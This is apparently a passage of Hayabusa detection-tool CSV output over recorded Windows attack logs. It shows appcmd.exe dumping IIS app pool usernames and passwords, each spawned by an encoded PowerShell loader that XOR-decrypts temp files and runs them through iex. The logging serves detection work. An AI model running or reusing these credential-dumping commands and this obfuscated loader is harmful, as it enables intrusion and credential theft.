QAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
2019-05-27 10:29:17.350 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe""  list apppool /text:processmodel.username  :  Path: C:\Windows\System32\inetsrv\appcmd.exe  :  User: IIS APPPOOL\DefaultAppPool  :  Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe""  -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
2019-05-27 10:29:17.581 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe""  list apppool /text:processmodel.password  :  Path: C:\Windows\System32\inetsrv\appcmd.exe  :  User: IIS APPPOOL\DefaultAppPool  :  Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe""  -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
2019-05-27 10:29:17.661 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe""  list apppool ""Filename: redirection.config"" /text:processmodel.username  :  Path: C:\Windows\System32\inetsrv\appcmd.exe  :  User: IIS APPPOOL\DefaultAppPool  :  Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe""  -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
2019-05-27 10:29:17.731 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe""  list apppool ""Filename: redirection.config"" /text:processmodel.password  :  Path: C:\Windows\System32\inetsrv\appcmd.exe  :  User: IIS APPPOOL\DefaultAppPool  :  Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe""  -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
2019-05-27 10:29:17.811 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe""  list apppool /text:processmodel.username  :  Path: C:\Windows\System32\inetsrv\appcmd.exe  :  User: IIS APPPOOL\DefaultAppPool  :  Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe""  -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
2019-05-27 10:29:17.891 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe""  list apppool /text:processmodel.password  :  Path: C:\Windows\System32\inetsrv\appcmd.exe  :  User: IIS APPPOOL\DefaultAppPool  :  Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe""  -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJ